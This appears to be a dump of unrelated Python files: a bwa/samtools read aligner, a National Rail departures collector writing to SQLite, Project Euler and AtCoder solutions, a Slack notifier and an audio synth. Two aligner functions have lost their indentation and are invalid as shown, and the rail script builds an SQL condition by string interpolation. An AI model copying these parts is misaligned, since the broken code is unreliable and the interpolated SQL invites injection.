            self.__barcodes_df['known_seq_id'].astype(str)
        # Index sequence / template files:
        # (bwa index is idempotent; output lands next to each fasta file.)
        for templ_filename in self.__seq_files.values():
            subprocess.call(['bwa', 'index', templ_filename])

    def score_alignments(self, tolerance, num_threads):
        '''Score alignments.

        Demultiplexes the reads, then aligns each barcode's reads against
        its candidate templates; per-template results are pushed onto a
        shared queue consumed by a ResultsThread, which finally writes the
        summary into the output directory.
        '''
        # num_threads <= 0 means "use every available core".
        num_threads = num_threads if num_threads > 0 else mp.cpu_count()
        print('Running pathway with %d threads' % num_threads)
        barcode_reads = demultiplex.demultiplex(self.__barcodes,
                                                self.__in_dir,
                                                self.__min_length,
                                                self.__max_read_files,
                                                self.__out_dir,
                                                tolerance=tolerance,
                                                num_threads=num_threads)
        write_queue = mp.Manager().Queue()
        results_thread = results.ResultsThread(sorted(self.__seq_files.keys()),
                                               self.__barcodes_df,
                                               write_queue)
        results_thread.start()
        for barcodes, reads_filename in barcode_reads.items():
            _score_alignment(self.__out_dir,
                             barcodes,
                             reads_filename,
                             self.__get_seq_files(barcodes),
                             num_threads,
                             write_queue)
        # Update summary:
        results_thread.close()
        results_thread.write(self.__out_dir)

    def __get_seq_files(self, barcodes):
        '''Get appropriate sequence files.

        If the barcode pair maps to a known seq_id, only that template is
        returned; unknown barcodes get an empty dict, and barcodes with no
        known_seq_id fall through to ALL templates.
        '''
        try:
            seq_id = self.__barcodes_df.loc[barcodes, 'known_seq_id']
            if seq_id:
                return {seq_id: self.__seq_files[seq_id]}
        except KeyError:
            print('Unexpected barcodes: ' + str(barcodes))
            return {}
        return self.__seq_files
def _get_barcode_seq(barcode_seq_filename):
'''Get barcode seq dict.'''
barcode_seq = pd.read_csv(barcode_seq_filename,
dtype={'barcode': str, 'seq_id': str}) \
if barcode_seq_filename else None
return barcode_seq.set_index('barcode')['seq_id'].to_dict()
def _score_alignment(dir_name, barcodes, reads_filename, seq_files,
                     num_threads, write_queue):
    '''Score an alignment.

    For each candidate template: align the reads with bwa mem, sort into a
    BAM with samtools, call variants with samtools mpileup, then push the
    per-template analysis onto write_queue via vcf_utils.analyse.
    Requires bwa and samtools on PATH; templates must be bwa-indexed.
    '''
    for seq_id, seq_filename in seq_files.items():
        barcode_dir_name = utils.get_dir(dir_name, barcodes, seq_id)
        # Output files are named after the third barcode component.
        bam_filename = os.path.join(barcode_dir_name, '%s.bam' % barcodes[2])
        vcf_filename = bam_filename.replace('.bam', '.vcf')
        # bwa mem (Oxford Nanopore 'ont2d' preset) streams SAM directly
        # into 'samtools sort' ('-' = read from stdin).
        prc = subprocess.Popen(('bwa', 'mem',
                                '-x', 'ont2d',
                                '-O', '6',
                                '-t', str(num_threads),
                                seq_filename, reads_filename),
                               stdout=subprocess.PIPE)
        subprocess.check_output(('samtools', 'sort',
                                 '-@%i' % num_threads,
                                 '-o', bam_filename, '-'),
                                stdin=prc.stdout)
        # NOTE(review): prc.stdout is not closed in the parent, so bwa may
        # not receive SIGPIPE if sort exits early — confirm acceptable.
        prc.wait()
        # Generate and analyse variants file:
        prc = subprocess.Popen(['samtools',
                                'mpileup',
                                '-uvf',
                                seq_filename,
                                '-t', 'DP',
                                '-o', vcf_filename,
                                bam_filename])
        prc.communicate()
        vcf_utils.analyse(vcf_filename, seq_id, barcodes, write_queue)
        print('Scored: %s against %s' % (reads_filename, seq_id))
def _get_seq_files(filename):
'''Get seq files.'''
seq_files = {}
if os.path.isdir(filename):
for fle in os.listdir(filename):
name, ext = os.path.splitext(os.path.basename(fle))
if ext == '.fasta':
seq_files[name] = os.path.join(filename, fle)
else:
seq_files[os.path.splitext(os.path.basename(filename))[0]] = filename
return seq_files
def main(args):
    '''main method.

    args: [out_root, in_dir, min_length, max_read_files, tolerance,
           num_threads, seq_file...]
    '''
    seq_files = {}
    for seq_filename in args[6:]:
        seq_files.update(_get_seq_files(seq_filename))
    # Each run writes into a fresh UUID-named subdirectory of the out root.
    run_dir = os.path.join(args[0], str(uuid.uuid4()))
    aligner = PathwayAligner(out_dir=run_dir,
                             in_dir=args[1],
                             seq_files=seq_files,
                             min_length=int(args[2]),
                             max_read_files=int(args[3]))
    aligner.score_alignments(int(args[4]), num_threads=int(args[5]))
if __name__ == '__main__':
    # Entry point: forward CLI arguments (without the program name) to main().
    main(sys.argv[1:])
| 6,111 | 1,788 |
import argparse
from time import sleep
import requests
import xmltodict
# http://www.nationalrail.co.uk/100296.aspx
# https://lite.realtime.nationalrail.co.uk/OpenLDBWS/
# http://zetcode.com/db/sqlitepythontutorial/
from utils.database import insert_into_db, delete_where, execute_sql
xml_payload = """<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="http://thalesgroup.com/RTTI/2016-02-16/ldb/" xmlns:ns2="http://thalesgroup.com/RTTI/2013-11-28/Token/types">
<SOAP-ENV:Header>
<ns2:AccessToken>
<ns2:TokenValue>{KEY}</ns2:TokenValue>
</ns2:AccessToken>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:GetDepBoardWithDetailsRequest>
<ns1:numRows>12</ns1:numRows>
<ns1:crs>{CRS}</ns1:crs>
<ns1:timeWindow>120</ns1:timeWindow>
</ns1:GetDepBoardWithDetailsRequest>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
"""
def fetch_trains(url, key, crs):
    """Yield upcoming departures for a station as flat dicts.

    url: The URL of the service
    key: Your National Rail API key
    crs: Station code (e.g. THA or PAD)

    Each yielded dict carries origin/destination, scheduled and estimated
    times, platform, and a pipe-delimited calling-points string.
    """
    payload = xml_payload.replace("{KEY}", key).replace("{CRS}", crs)
    response = requests.post(url, data=payload,
                             headers={'content-type': 'text/xml'})
    data = xmltodict.parse(response.content)
    board = data["soap:Envelope"]["soap:Body"]["GetDepBoardWithDetailsResponse"]["GetStationBoardResult"]
    services = board["lt5:trainServices"]["lt5:service"]
    # A board with a single service comes back as a dict, not a list.
    if type(services) is not list:
        services = [services]
    for service in services:
        if "lt5:subsequentCallingPoints" in service:
            raw_points = service["lt5:subsequentCallingPoints"]["lt4:callingPointList"]["lt4:callingPoint"]
        else:
            raw_points = []
        # Keep only calling points that carry both a CRS code and a name,
        # and flatten them to "crs,name,scheduled,estimated" records.
        cp_string = "|".join(
            "{0},{1},{2},{3}".format(point["lt4:crs"],
                                     point["lt4:locationName"],
                                     point.get("lt4:st", "-"),
                                     point.get("lt4:et", "-"))
            for point in raw_points
            if "lt4:crs" in point and "lt4:locationName" in point
        )
        yield {
            "crs": crs,
            "origin": service["lt5:origin"]["lt4:location"]["lt4:locationName"],
            "destination": service["lt5:destination"]["lt4:location"]["lt4:locationName"],
            "std": service.get("lt4:std"),
            "etd": service.get("lt4:etd"),
            "platform": service.get("lt4:platform", "-"),
            "calling_points": cp_string
        }
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='National Rail Data Collector')
    parser.add_argument('--key', help='API Key', required=True)
    parser.add_argument('--url', help='API URL', default="http://lite.realtime.nationalrail.co.uk/OpenLDBWS/ldb9.asmx")
    parser.add_argument('--crs', help='CRS Station Code (default is Thatcham)', default="THA")
    parser.add_argument('--db', help='SQLite DB Name', default="data/trains.db")
    args = parser.parse_args()
    execute_sql(args.db, "create table if not exists departures (crs TEXT, platform TEXT, std TEXT, etd TEXT, origin TEXT, destination TEXT, calling_points TEXT);")
    crs_list = args.crs.split(",")
    # Poll each station forever, replacing its cached departures each pass.
    while True:
        for crs in crs_list:
            try:
                print("Processing station '{0}'".format(crs))
                departures = fetch_trains(args.url, args.key, crs)
                # NOTE(review): crs is interpolated straight into SQL; fine
                # for CLI-supplied codes, parameterize if the source changes.
                delete_where(args.db, "departures", "crs == '{0}'".format(crs))
                insert_into_db(args.db, "departures", departures)
                sleep(1)
            except Exception as e:
                # FIX: the original printed e.message, which is missing on
                # most exception types (removed in Python 3, deprecated in
                # Python 2.6+) and would raise inside the handler; print the
                # exception itself. Function-call print works on 2 and 3.
                print(e)
                # Back off before retrying after a failure.
                sleep(10)
| 3,815 | 1,307 |
"""
Problem 12
Highly divisible triangular number
"""
from utility.decorators import timeit, printit
from utility.math_f import sum_naturals_to_n, get_divisors
from math import ceil, sqrt
def div_count(n):
    """Return the number of divisors of n (n >= 1).

    Walks trial divisors i with i*i <= n; each hit counts both i and n//i,
    and a perfect square is corrected down by one so sqrt(n) is counted
    only once. FIX: the original iterated up to ceil(sqrt(n)) inclusive,
    which double-counted the pair (k, n//k) whenever k = ceil(sqrt(n))
    divided a non-square n (e.g. div_count(12) returned 8 instead of 6).
    """
    n = int(n)  # tolerate an exact float half such as n/2 on Python 3
    total = 0
    i = 1
    while i * i <= n:
        if n % i == 0:  # i and n//i are a divisor pair
            total += 2
            if i * i == n:  # perfect square: i == n//i, count once
                total -= 1
        i += 1
    return total
@printit
@timeit
def run(m):
    """Return the first triangular number with at least m divisors.

    T(n) = n*(n+1)/2 and gcd(n, n+1) == 1, so the divisor count factors as
    div_count(n/2) * div_count(n+1) for even n, and
    div_count(n) * div_count((n+1)/2) for odd n.
    """
    for n in range(1, 1000000):
        # FIX: use floor division so the halved factor stays an integer on
        # Python 3 (plain / would pass floats into div_count); the halved
        # operand is always even, so // is value-identical.
        if n % 2 == 0:
            cnt = div_count(n // 2) * div_count(n + 1)
        else:
            cnt = div_count(n) * div_count((n + 1) // 2)
        # NOTE(review): '>=' returns the first count of at least m; Euler 12
        # asks for "over" m — confirm the intended comparison.
        if cnt >= m:
            return sum_naturals_to_n(n)
if __name__ == "__main__":
    # Project Euler 12 target: divisor-count threshold of 500.
    n = 500
    run(n)
| 877 | 339 |
# uninhm
# https://atcoder.jp/contests/abc183/tasks/abc183_d
# data structures, sorting
# Sweep-line over hot-water demand intervals: +p at each start, -p at each
# stop; feasible iff the running total never exceeds capacity w.
n, w = map(int, input().split())
events = []
for _ in range(n):
    s, t, p = map(int, input().split())
    events.append((s, p))
    events.append((t, -p))
events.sort()
load = 0
feasible = True
for idx, (moment, delta) in enumerate(events):
    load += delta
    # Defer the capacity check until every event at this timestamp applied.
    if idx + 1 < len(events) and events[idx + 1][0] == moment:
        continue
    if load > w:
        feasible = False
        break
print("Yes" if feasible else "No")
| 469 | 192 |
#!/usr/bin/env python
import os
from slackclient import SlackClient
def send(msg="no msg", rsp="ok"):
    """Post msg to Slack with a status emoji chosen from rsp.

    rsp "ok" -> white check mark (optionally suppressed via SKIP_OK_MESSAGES
    or redirected to SLACK_OK_CHANNEL); anything else -> bomb.
    Reads SLACK_API_TOKEN and SLACK_CHANNEL from the environment.
    """
    channel = os.environ['SLACK_CHANNEL']
    if rsp == "ok":
        # A set-and-truthy SKIP_OK_MESSAGES suppresses success messages.
        if os.environ.get('SKIP_OK_MESSAGES'):
            return
        ok_channel = os.environ.get('SLACK_OK_CHANNEL')
        if ok_channel:
            channel = ok_channel
        msg = ":white_check_mark: " + msg
    else:
        msg = ":bomb: " + msg
    client = SlackClient(token=os.environ['SLACK_API_TOKEN'])
    client.api_call(
        "chat.postMessage",
        channel=channel,
        text=msg
    )
| 635 | 239 |
#!/usr/bin/env python
# Idea taken from www.wavepot.com
import math
from AudioPython import *
from AudioPython.dsp import *
def bass_osc(n):
    """Bass voice: a triangle at frequency n plus a quiet sine 5 octaves up."""
    body = triangle_wave(frequency=n, amplitude=0.24)
    shimmer = sine_wave(frequency=n * 32, amplitude=0.052)
    while True:
        yield next(body) + next(shimmer)
def sub(gen, amp):
    """Slow FM-style modulation of samples drawn from gen, scaled by amp.

    A very slowly advancing phase drives two nested sine LFOs that shape
    both the modulation depth and an additive phase offset.
    """
    tau = 2 * math.pi
    phase = 0
    while True:
        phase += 0.000014
        wobble = 1 + math.sin(1.1337 * phase * tau)
        depth = 2 + (1 + math.sin(0.42 * phase * tau)) * 15
        yield math.sin(next(gen) * wobble * depth + tau * phase) * amp
# NOTE(review): 44100 / 500 is the integer 88 on Python 2 but 88.2 on
# Python 3 -- both flow through the generators, but the pitch differs
# slightly; confirm which interpreter/pitch is intended.
n = 44100 / 500
channels = ((sub(bass_osc(n), 0.3),),)
samples = compute_samples(channels)
write_wavefile("temp.wav", samples)
| 678 | 289 |